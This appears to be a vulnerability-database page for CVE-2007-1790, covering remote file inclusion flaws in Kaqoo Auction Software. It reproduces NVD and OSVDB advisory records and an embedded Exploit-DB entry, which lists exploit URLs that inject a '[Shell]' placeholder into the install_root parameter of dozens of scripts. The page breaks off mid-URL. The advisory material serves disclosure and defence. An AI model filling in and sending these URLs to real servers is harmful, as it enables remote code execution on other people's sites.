Search...

CVE-2007-1790

2007-03-31T06:19:00

ID CVE-2007-1790
Type cve
Reporter NVD
Modified 2017-10-10T21:31:59

Description

Multiple PHP remote file inclusion vulnerabilities in Kaqoo Auction Software Free Edition allow remote attackers to execute arbitrary PHP code via a URL in the install_root parameter to (1) support.inc.php, (2) function.inc.php, (3) rdal_object.inc.php, (4) rdal_editor.inc.php. (5) login.inc.php, (6) request.inc.php, and (7) categories.inc.php in include/core/; (8) save.inc.php, (9) preview.inc.php, (10) edit_item.inc.php, (11) new_item.inc.php, and (12) item_info.inc.php in include/display/item/; (13) search.inc.php, (14) item_edit.inc.php, (15) register_succsess.inc.php, (16) context_menu.inc.php, (17) item_repost.inc.php, (18) balance.inc.php, (19) featured.inc.php, (20) user.inc.php, (21) buynow.inc.php, (22) install_complete.inc.php, (23) fees_info.inc.php, (24) user_feedback.inc.php, (25) admin_balance.inc.php, (26) activate.inc.php, (27) user_info.inc.php, (28) member.inc.php, (29) add_bid.inc.php, (30) items_filter.inc.php, (31) my_info.inc.php, (32) register.inc.php, (33) leave_feedback.inc.php, and (34) user_auctions.inc.php in include/display/; and (35) design/form.inc.php, (36) processor.inc.php, (37) interfaces.inc.php (38) left_menu.inc.php, (39) login.inc.php, and (40) categories.inc.php in include/.

JSON Vulners Source

Initial Source

{"id": "CVE-2007-1790", "bulletinFamily": "NVD", "title": "CVE-2007-1790", "description": "Multiple PHP remote file inclusion vulnerabilities in Kaqoo Auction Software Free Edition allow remote attackers to execute arbitrary PHP code via a URL in the install_root parameter to (1) support.inc.php, (2) function.inc.php, (3) rdal_object.inc.php, (4) rdal_editor.inc.php. (5) login.inc.php, (6) request.inc.php, and (7) categories.inc.php in include/core/; (8) save.inc.php, (9) preview.inc.php, (10) edit_item.inc.php, (11) new_item.inc.php, and (12) item_info.inc.php in include/display/item/; (13) search.inc.php, (14) item_edit.inc.php, (15) register_succsess.inc.php, (16) context_menu.inc.php, (17) item_repost.inc.php, (18) balance.inc.php, (19) featured.inc.php, (20) user.inc.php, (21) buynow.inc.php, (22) install_complete.inc.php, (23) fees_info.inc.php, (24) user_feedback.inc.php, (25) admin_balance.inc.php, (26) activate.inc.php, (27) user_info.inc.php, (28) member.inc.php, (29) add_bid.inc.php, (30) items_filter.inc.php, (31) my_info.inc.php, (32) register.inc.php, (33) leave_feedback.inc.php, and (34) user_auctions.inc.php in include/display/; and (35) design/form.inc.php, (36) processor.inc.php, (37) interfaces.inc.php (38) left_menu.inc.php, (39) login.inc.php, and (40) categories.inc.php in include/.", "published": "2007-03-31T06:19:00", "modified": "2017-10-10T21:31:59", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-1790", "reporter": "NVD", "references": ["https://exchange.xforce.ibmcloud.com/vulnerabilities/33335", "https://www.exploit-db.com/exploits/3607", "http://www.vupen.com/english/advisories/2007/1180", "http://www.securityfocus.com/bid/23211"], "cvelist": ["CVE-2007-1790"], "type": "cve", "lastseen": "2017-10-11T11:07:05", "history": [{"bulletin": {"assessment": {"href": "", "name": "", "system": ""}, "bulletinFamily": "NVD", "cpe": ["cpe:/a:kaqoo:kaqoo_auction_software:::free"], "cvelist": ["CVE-2007-1790"], "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "description": "Multiple PHP remote file inclusion vulnerabilities in Kaqoo Auction Software Free Edition allow remote attackers to execute arbitrary PHP code via a URL in the install_root parameter to (1) support.inc.php, (2) function.inc.php, (3) rdal_object.inc.php, (4) rdal_editor.inc.php. (5) login.inc.php, (6) request.inc.php, and (7) categories.inc.php in include/core/; (8) save.inc.php, (9) preview.inc.php, (10) edit_item.inc.php, (11) new_item.inc.php, and (12) item_info.inc.php in include/display/item/; (13) search.inc.php, (14) item_edit.inc.php, (15) register_succsess.inc.php, (16) context_menu.inc.php, (17) item_repost.inc.php, (18) balance.inc.php, (19) featured.inc.php, (20) user.inc.php, (21) buynow.inc.php, (22) install_complete.inc.php, (23) fees_info.inc.php, (24) user_feedback.inc.php, (25) admin_balance.inc.php, (26) activate.inc.php, (27) user_info.inc.php, (28) member.inc.php, (29) add_bid.inc.php, (30) items_filter.inc.php, (31) my_info.inc.php, (32) register.inc.php, (33) leave_feedback.inc.php, and (34) user_auctions.inc.php in include/display/; and (35) design/form.inc.php, (36) processor.inc.php, (37) interfaces.inc.php (38) left_menu.inc.php, (39) login.inc.php, and (40) categories.inc.php in include/.", "edition": 1, "enchantments": {}, "hash": "c36b5705bec1c644cb8491ebf74cd4ad7023bf7aee007f5979a492ec0be5975c", "hashmap": [{"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "scanner"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "reporter"}, {"hash": "6d3f4796275bb54c21a33b82f399cc6d", "key": "assessment"}, {"hash": "0077e9e7d0a154acd4322336686d1ec7", "key": "modified"}, {"hash": "11a37ce12b7bb6a1693f8e0b5fdcbd75", "key": "published"}, {"hash": "f1a12dd55a9bd68bdb4fbf9ea5737ce7", "key": "references"}, {"hash": "98eea72defe61d210fb749649df4af99", "key": "cvelist"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "6a5b39ee5a9deda5686b1c8c4dbe8895", "key": "description"}, {"hash": "5ec52bbe9e8040959857f0e14a9193b4", "key": "title"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "8aea9e3428b7216136b7f4e08d927ea1", "key": "cpe"}, {"hash": "d7ff061b683df5966b014bd58c57e28f", "key": "href"}, {"hash": "737e2591b537c46d1ca7ce6f0cea5cb9", "key": "cvss"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-1790", "id": "CVE-2007-1790", "lastseen": "2016-09-03T08:40:10", "modified": "2011-09-08T00:00:00", "objectVersion": "1.2", "published": "2007-03-31T06:19:00", "references": ["http://xforce.iss.net/xforce/xfdb/33335", "http://www.milw0rm.com/exploits/3607", "http://www.vupen.com/english/advisories/2007/1180", "http://www.securityfocus.com/bid/23211"], "reporter": "NVD", "scanner": [], "title": "CVE-2007-1790", "type": "cve", "viewCount": 0}, "differentElements": ["references", "modified"], "edition": 1, "lastseen": "2016-09-03T08:40:10"}, {"bulletin": {"assessment": {"href": "", "name": "", "system": ""}, "bulletinFamily": "NVD", "cpe": ["cpe:/a:kaqoo:kaqoo_auction_software:::free"], "cvelist": ["CVE-2007-1790"], "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "description": "Multiple PHP remote file inclusion vulnerabilities in Kaqoo Auction Software Free Edition allow remote attackers to execute arbitrary PHP code via a URL in the install_root parameter to (1) support.inc.php, (2) function.inc.php, (3) rdal_object.inc.php, (4) rdal_editor.inc.php. (5) login.inc.php, (6) request.inc.php, and (7) categories.inc.php in include/core/; (8) save.inc.php, (9) preview.inc.php, (10) edit_item.inc.php, (11) new_item.inc.php, and (12) item_info.inc.php in include/display/item/; (13) search.inc.php, (14) item_edit.inc.php, (15) register_succsess.inc.php, (16) context_menu.inc.php, (17) item_repost.inc.php, (18) balance.inc.php, (19) featured.inc.php, (20) user.inc.php, (21) buynow.inc.php, (22) install_complete.inc.php, (23) fees_info.inc.php, (24) user_feedback.inc.php, (25) admin_balance.inc.php, (26) activate.inc.php, (27) user_info.inc.php, (28) member.inc.php, (29) add_bid.inc.php, (30) items_filter.inc.php, (31) my_info.inc.php, (32) register.inc.php, (33) leave_feedback.inc.php, and (34) user_auctions.inc.php in include/display/; and (35) design/form.inc.php, (36) processor.inc.php, (37) interfaces.inc.php (38) left_menu.inc.php, (39) login.inc.php, and (40) categories.inc.php in include/.", "edition": 2, "enchantments": {}, "hash": "ee8c7b836875d1faee76fe8d15159d118e94f18f2ffc67c4dffb935d45d84f9a", "hashmap": [{"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "scanner"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "reporter"}, {"hash": "6d3f4796275bb54c21a33b82f399cc6d", "key": "assessment"}, {"hash": "11a37ce12b7bb6a1693f8e0b5fdcbd75", "key": "published"}, {"hash": "be5022a8788b13977d38df40bec48d45", "key": "references"}, {"hash": "98eea72defe61d210fb749649df4af99", "key": "cvelist"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "6a5b39ee5a9deda5686b1c8c4dbe8895", "key": "description"}, {"hash": "5ec52bbe9e8040959857f0e14a9193b4", "key": "title"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "8aea9e3428b7216136b7f4e08d927ea1", "key": "cpe"}, {"hash": "d7ff061b683df5966b014bd58c57e28f", "key": "href"}, {"hash": "737e2591b537c46d1ca7ce6f0cea5cb9", "key": "cvss"}, {"hash": "47c594781a1a79f94bb4b7fc7651b390", "key": "modified"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-1790", "id": "CVE-2007-1790", "lastseen": "2017-07-29T11:21:56", "modified": "2017-07-28T21:30:59", "objectVersion": "1.3", "published": "2007-03-31T06:19:00", "references": ["https://exchange.xforce.ibmcloud.com/vulnerabilities/33335", "http://www.milw0rm.com/exploits/3607", "http://www.vupen.com/english/advisories/2007/1180", "http://www.securityfocus.com/bid/23211"], "reporter": "NVD", "scanner": [], "title": "CVE-2007-1790", "type": "cve", "viewCount": 0}, "differentElements": ["references", "modified"], "edition": 2, "lastseen": "2017-07-29T11:21:56"}], "edition": 3, "hashmap": [{"key": "assessment", "hash": "6d3f4796275bb54c21a33b82f399cc6d"}, {"key": "bulletinFamily", "hash": "601892ece72be3be2f57266ca2354792"}, {"key": "cpe", "hash": "8aea9e3428b7216136b7f4e08d927ea1"}, {"key": "cvelist", "hash": "98eea72defe61d210fb749649df4af99"}, {"key": "cvss", "hash": "737e2591b537c46d1ca7ce6f0cea5cb9"}, {"key": "description", "hash": "6a5b39ee5a9deda5686b1c8c4dbe8895"}, {"key": "href", "hash": "d7ff061b683df5966b014bd58c57e28f"}, {"key": "modified", "hash": "08c9497023b2af2888b4c672105786d5"}, {"key": "published", "hash": "11a37ce12b7bb6a1693f8e0b5fdcbd75"}, {"key": "references", "hash": "fb47867a73c7837384be2747ac2f98d9"}, {"key": "reporter", "hash": "601892ece72be3be2f57266ca2354792"}, {"key": "scanner", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "title", "hash": "5ec52bbe9e8040959857f0e14a9193b4"}, {"key": "type", "hash": "1716b5fcbb7121af74efdc153d0166c5"}], "hash": "3cda6bc71e8c91cfc719fa15ace10b69108bd1f4a3a221432f75035f2a0d2903", "viewCount": 0, "enchantments": {"score": {"value": 7.5, "vector": "NONE", "modified": "2017-10-11T11:07:05"}, "dependencies": {"references": [{"type": "osvdb", "idList": ["OSVDB:34557", "OSVDB:34553", "OSVDB:34580", "OSVDB:34581", "OSVDB:34576", "OSVDB:34570", "OSVDB:34582", "OSVDB:34577", "OSVDB:34572", "OSVDB:34574"]}, {"type": "exploitdb", "idList": ["EDB-ID:3607"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:7521"]}], "modified": "2017-10-11T11:07:05"}, "vulnersScore": 7.5}, "objectVersion": "1.3", "cpe": ["cpe:/a:kaqoo:kaqoo_auction_software:::free"], "assessment": {"href": "", "name": "", "system": ""}, "scanner": []}

{"osvdb": [{"lastseen": "2017-04-28T13:20:30", "bulletinFamily": "software", "description": "## Vulnerability Description\nKaqoo Auction Software (Free Edition) contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the include/display/activate.inc.php script not properly sanitizing user input supplied to the 'install_root' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Solution Description\nCurrently, there are no known upgrades, patches, or workarounds available to correct this issue.\n## Short Description\nKaqoo Auction Software (Free Edition) contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the include/display/activate.inc.php script not properly sanitizing user input supplied to the 'install_root' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Manual Testing Notes\nhttp://[target]/include/display/activate.inc.php?install_root=[Shell]\n## References:\nVendor URL: http://kaqoo.com/\n[Secunia Advisory ID:24696](https://secuniaresearch.flexerasoftware.com/advisories/24696/)\nOther Advisory URL: http://milw0rm.com/exploits/3607\nISS X-Force ID: 33335\nFrSIRT Advisory: ADV-2007-1180\n[CVE-2007-1790](https://vulners.com/cve/CVE-2007-1790)\nBugtraq ID: 23211\n", "modified": "2007-03-29T07:49:37", "published": "2007-03-29T07:49:37", "href": "https://vulners.com/osvdb/OSVDB:34570", "id": "OSVDB:34570", "title": "Kaqoo Auction Software Free Edition include/display/activate.inc.php install_root Variable Remote File Inclusion", "type": "osvdb", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:30", "bulletinFamily": "software", "description": "## Vulnerability Description\nKaqoo Auction Software (Free Edition) contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the include/display/install_complete.inc.php script not properly sanitizing user input supplied to the 'install_root' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Solution Description\nCurrently, there are no known upgrades, patches, or workarounds available to correct this issue.\n## Short Description\nKaqoo Auction Software (Free Edition) contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the include/display/install_complete.inc.php script not properly sanitizing user input supplied to the 'install_root' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Manual Testing Notes\nhttp://[target]/include/display/install_complete.inc.php?install_root=[Shell]\n## References:\nVendor URL: http://kaqoo.com/\n[Secunia Advisory ID:24696](https://secuniaresearch.flexerasoftware.com/advisories/24696/)\nOther Advisory URL: http://milw0rm.com/exploits/3607\nISS X-Force ID: 33335\nFrSIRT Advisory: ADV-2007-1180\n[CVE-2007-1790](https://vulners.com/cve/CVE-2007-1790)\nBugtraq ID: 23211\n", "modified": "2007-03-29T07:49:37", "published": "2007-03-29T07:49:37", "href": "https://vulners.com/osvdb/OSVDB:34566", "id": "OSVDB:34566", "title": "Kaqoo Auction Software Free Edition include/display/install_complete.inc.php install_root Variable Remote File Inclusion", "type": "osvdb", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:30", "bulletinFamily": "software", "description": "## Vulnerability Description\nKaqoo Auction Software (Free Edition) contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the include/display/leave_feedback.inc.php script not properly sanitizing user input supplied to the 'install_root' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Solution Description\nCurrently, there are no known upgrades, patches, or workarounds available to correct this issue.\n## Short Description\nKaqoo Auction Software (Free Edition) contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the include/display/leave_feedback.inc.php script not properly sanitizing user input supplied to the 'install_root' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Manual Testing Notes\nhttp://[target]/include/display/leave_feedback.inc.php?install_root=[Shell]\n## References:\nVendor URL: http://kaqoo.com/\n[Secunia Advisory ID:24696](https://secuniaresearch.flexerasoftware.com/advisories/24696/)\nOther Advisory URL: http://milw0rm.com/exploits/3607\nISS X-Force ID: 33335\nFrSIRT Advisory: ADV-2007-1180\n[CVE-2007-1790](https://vulners.com/cve/CVE-2007-1790)\nBugtraq ID: 23211\n", "modified": "2007-03-29T07:49:37", "published": "2007-03-29T07:49:37", "href": "https://vulners.com/osvdb/OSVDB:34577", "id": "OSVDB:34577", "title": "Kaqoo Auction Software Free Edition include/display/leave_feedback.inc.php install_root Variable Remote File Inclusion", "type": "osvdb", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:30", "bulletinFamily": "software", "description": "## Vulnerability Description\nKaqoo Auction Software (Free Edition) contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the include/core/login.inc.php script not properly sanitizing user input supplied to the 'install_root' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Solution Description\nCurrently, there are no known upgrades, patches, or workarounds available to correct this issue.\n## Short Description\nKaqoo Auction Software (Free Edition) contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the include/core/login.inc.php script not properly sanitizing user input supplied to the 'install_root' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Manual Testing Notes\nhttp://[target]/include/core/login.inc.php?install_root=[Shell]\n## References:\nVendor URL: http://kaqoo.com/\n[Secunia Advisory ID:24696](https://secuniaresearch.flexerasoftware.com/advisories/24696/)\nOther Advisory URL: http://milw0rm.com/exploits/3607\nISS X-Force ID: 33335\nFrSIRT Advisory: ADV-2007-1180\n[CVE-2007-1790](https://vulners.com/cve/CVE-2007-1790)\nBugtraq ID: 23211\n", "modified": "2007-03-29T07:49:37", "published": "2007-03-29T07:49:37", "href": "https://vulners.com/osvdb/OSVDB:34549", "id": "OSVDB:34549", "title": "Kaqoo Auction Software Free Edition include/core/login.inc.php install_root Variable Remote File Inclusion", "type": "osvdb", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:30", "bulletinFamily": "software", "description": "## Vulnerability Description\nKaqoo Auction Software (Free Edition) contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the include/left_menu.inc.php script not properly sanitizing user input supplied to the 'install_root' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Solution Description\nCurrently, there are no known upgrades, patches, or workarounds available to correct this issue.\n## Short Description\nKaqoo Auction Software (Free Edition) contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the include/left_menu.inc.php script not properly sanitizing user input supplied to the 'install_root' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Manual Testing Notes\nhttp://[target]/include/left_menu.inc.php?install_root=[Shell]\n## References:\nVendor URL: http://kaqoo.com/\n[Secunia Advisory ID:24696](https://secuniaresearch.flexerasoftware.com/advisories/24696/)\nOther Advisory URL: http://milw0rm.com/exploits/3607\nISS X-Force ID: 33335\nFrSIRT Advisory: ADV-2007-1180\n[CVE-2007-1790](https://vulners.com/cve/CVE-2007-1790)\nBugtraq ID: 23211\n", "modified": "2007-03-29T07:49:37", "published": "2007-03-29T07:49:37", "href": "https://vulners.com/osvdb/OSVDB:34582", "id": "OSVDB:34582", "title": "Kaqoo Auction Software Free Edition include/left_menu.inc.php install_root Variable Remote File Inclusion", "type": "osvdb", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:30", "bulletinFamily": "software", "description": "## Vulnerability Description\nKaqoo Auction Software (Free Edition) contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the include/display/context_menu.inc.php script not properly sanitizing user input supplied to the 'install_root' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Solution Description\nCurrently, there are no known upgrades, patches, or workarounds available to correct this issue.\n## Short Description\nKaqoo Auction Software (Free Edition) contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the include/display/context_menu.inc.php script not properly sanitizing user input supplied to the 'install_root' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Manual Testing Notes\nhttp://[target]/include/display/context_menu.inc.php?install_root=[Shell]\n## References:\nVendor URL: http://kaqoo.com/\n[Secunia Advisory ID:24696](https://secuniaresearch.flexerasoftware.com/advisories/24696/)\nOther Advisory URL: http://milw0rm.com/exploits/3607\nISS X-Force ID: 33335\nFrSIRT Advisory: ADV-2007-1180\n[CVE-2007-1790](https://vulners.com/cve/CVE-2007-1790)\nBugtraq ID: 23211\n", "modified": "2007-03-29T07:49:37", "published": "2007-03-29T07:49:37", "href": "https://vulners.com/osvdb/OSVDB:34560", "id": "OSVDB:34560", "title": "Kaqoo Auction Software Free Edition include/display/context_menu.inc.php install_root Variable Remote File Inclusion", "type": "osvdb", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:30", "bulletinFamily": "software", "description": "## Vulnerability Description\nKaqoo Auction Software (Free Edition) contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the include/login.inc.php script not properly sanitizing user input supplied to the 'install_root' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Solution Description\nCurrently, there are no known upgrades, patches, or workarounds available to correct this issue.\n## Short Description\nKaqoo Auction Software (Free Edition) contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the include/login.inc.php script not properly sanitizing user input supplied to the 'install_root' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Manual Testing Notes\nhttp://[target]/include/login.inc.php?install_root=[Shell]\n## References:\nVendor URL: http://kaqoo.com/\n[Secunia Advisory ID:24696](https://secuniaresearch.flexerasoftware.com/advisories/24696/)\nOther Advisory URL: http://milw0rm.com/exploits/3607\nISS X-Force ID: 33335\nFrSIRT Advisory: ADV-2007-1180\n[CVE-2007-1790](https://vulners.com/cve/CVE-2007-1790)\nBugtraq ID: 23211\n", "modified": "2007-03-29T07:49:37", "published": "2007-03-29T07:49:37", "href": "https://vulners.com/osvdb/OSVDB:34583", "id": "OSVDB:34583", "title": "Kaqoo Auction Software Free Edition include/login.inc.php install_root Variable Remote File Inclusion", "type": "osvdb", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:30", "bulletinFamily": "software", "description": "## Vulnerability Description\nKaqoo Auction Software (Free Edition) contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the include/display/buynow.inc.php script not properly sanitizing user input supplied to the 'install_root' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Solution Description\nCurrently, there are no known upgrades, patches, or workarounds available to correct this issue.\n## Short Description\nKaqoo Auction Software (Free Edition) contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the include/display/buynow.inc.php script not properly sanitizing user input supplied to the 'install_root' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Manual Testing Notes\nhttp://[target]/include/display/buynow.inc.php?install_root=[Shell]\n## References:\nVendor URL: http://kaqoo.com/\n[Secunia Advisory ID:24696](https://secuniaresearch.flexerasoftware.com/advisories/24696/)\nOther Advisory URL: http://milw0rm.com/exploits/3607\nISS X-Force ID: 33335\nFrSIRT Advisory: ADV-2007-1180\n[CVE-2007-1790](https://vulners.com/cve/CVE-2007-1790)\nBugtraq ID: 23211\n", "modified": "2007-03-29T07:49:37", "published": "2007-03-29T07:49:37", "href": "https://vulners.com/osvdb/OSVDB:34565", "id": "OSVDB:34565", "title": "Kaqoo Auction Software Free Edition include/display/buynow.inc.php install_root Variable Remote File Inclusion", "type": "osvdb", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:30", "bulletinFamily": "software", "description": "## Vulnerability Description\nKaqoo Auction Software (Free Edition) contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the include/display/item_repost.inc.php script not properly sanitizing user input supplied to the 'install_root' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Solution Description\nCurrently, there are no known upgrades, patches, or workarounds available to correct this issue.\n## Short Description\nKaqoo Auction Software (Free Edition) contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the include/display/item_repost.inc.php script not properly sanitizing user input supplied to the 'install_root' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Manual Testing Notes\nhttp://[target]/include/display/item_repost.inc.php?install_root=[Shell]\n## References:\nVendor URL: http://kaqoo.com/\n[Secunia Advisory ID:24696](https://secuniaresearch.flexerasoftware.com/advisories/24696/)\nOther Advisory URL: http://milw0rm.com/exploits/3607\nISS X-Force ID: 33335\nFrSIRT Advisory: ADV-2007-1180\n[CVE-2007-1790](https://vulners.com/cve/CVE-2007-1790)\nBugtraq ID: 23211\n", "modified": "2007-03-29T07:49:37", "published": "2007-03-29T07:49:37", "href": "https://vulners.com/osvdb/OSVDB:34561", "id": "OSVDB:34561", "title": "Kaqoo Auction Software Free Edition include/display/item_repost.inc.php install_root Variable Remote File Inclusion", "type": "osvdb", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:30", "bulletinFamily": "software", "description": "## Vulnerability Description\nKaqoo Auction Software (Free Edition) contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the include/core/support.inc.php script not properly sanitizing user input supplied to the 'install_root' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Solution Description\nCurrently, there are no known upgrades, patches, or workarounds available to correct this issue.\n## Short Description\nKaqoo Auction Software (Free Edition) contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the include/core/support.inc.php script not properly sanitizing user input supplied to the 'install_root' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Manual Testing Notes\nhttp://[target]/include/core/support.inc.php?install_root=[Shell]\n## References:\nVendor URL: http://kaqoo.com/\n[Secunia Advisory ID:24696](https://secuniaresearch.flexerasoftware.com/advisories/24696/)\nOther Advisory URL: http://milw0rm.com/exploits/3607\nISS X-Force ID: 33335\nFrSIRT Advisory: ADV-2007-1180\n[CVE-2007-1790](https://vulners.com/cve/CVE-2007-1790)\nBugtraq ID: 23211\n", "modified": "2007-03-29T07:49:37", "published": "2007-03-29T07:49:37", "href": "https://vulners.com/osvdb/OSVDB:34545", "id": "OSVDB:34545", "title": "Kaqoo Auction Software Free Edition include/core/support.inc.php install_root Variable Remote File Inclusion", "type": "osvdb", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "exploitdb": [{"lastseen": "2016-01-31T18:53:54", "bulletinFamily": "exploit", "description": "Kaqoo Auction (install_root) Multiple Remote File Include Vulnerabilities. CVE-2007-1790. Webapps exploit for php platform", "modified": "2007-03-29T00:00:00", "published": "2007-03-29T00:00:00", "id": "EDB-ID:3607", "href": "https://www.exploit-db.com/exploits/3607/", "type": "exploitdb", "title": "Kaqoo Auction install_root Multiple Remote File Include Vulnerabilities", "sourceData": "*************************************************************\nTo ConTacT mE @ www.Asb-May.net/bb\nScRiPt:-http://kaqoo.com/server/download.php\nGrEaTz To:-ToOofa-HaCk.eGy-Alk()mad()z-Bright Dark (All AsB-MaY DisCoverY\nExPloIts GrOup)\nDiscovered By:- ThE dE@Th <<{AsB-MaY DiScOvEr ExPlIoTs Gr0uP} >>\n******************************************************************************\nWrong Code:-\ninclude_once(\"$install_root\n********************************************************************************\nExPlOiT:-http://www.SitE.com/include/core/support.inc.php?install_root=[Shell]\nExPlOiT:-http://www.SitE.com/include/core/function.inc.php?install_root=[Shell]\nExPlOiT:-http://www.SitE.com/include/core/rdal_object.inc.php?install_root=[Shell]\nExPlOiT:-http://www.SitE.com/include/core/rdal_editor.inc.php?install_root=[Shell]\nExPlOiT:-http://www.SitE.com/include/core/login.inc.php?install_root=[Shell]\nExPlOiT:-http://www.SitE.com/include/core/request.inc.php?install_root=[Shell]\nExPlOiT:-http://www.SitE.com/include/core/categories.inc.php?install_root=[Shell]\nExPlOiT:-http://www.SitE.com/include/display/item/save.inc.php?install_root=[Shell]\nExPlOiT:-http://www.SitE.com/include/display/item/preview.inc.php?install_root=[Shell]\nExPlOiT:-http://www.SitE.com/include/display/item/edit_item.inc.php?install_root=[Shell]\nExPlOiT:-http://www.SitE.com/include/display/item/new_item.inc.php?install_root=[Shell]\nExPlOiT:-http://www.SitE.com/include/display/item/item_info.inc.php?install_root=[Shell]\nExPlOiT:-http://www.SitE.com/include/display/search.inc.php?install_root=[Shell]\nExPlOiT:-http://www.SitE.com/include/display/item_edit.inc.php?install_root=[Shell]\nExPlOiT:-http://www.SitE.com/include/display/register_succsess.inc.php?install_root=[Shell]\nExPlOiT:-http://www.SitE.com/include/display/context_menu.inc.php?install_root=[Shell]\nExPlOiT:-http://www.SitE.com/include/display/item_repost.inc.php?install_root=[Shell]\nExPlOiT:-http://www.SitE.com/include/display/balance.inc.php?install_root=[Shell]\nExPlOiT:-http://www.SitE.com/include/display/featured.inc.php?install_root=[Shell]\nExPlOiT:-http://www.S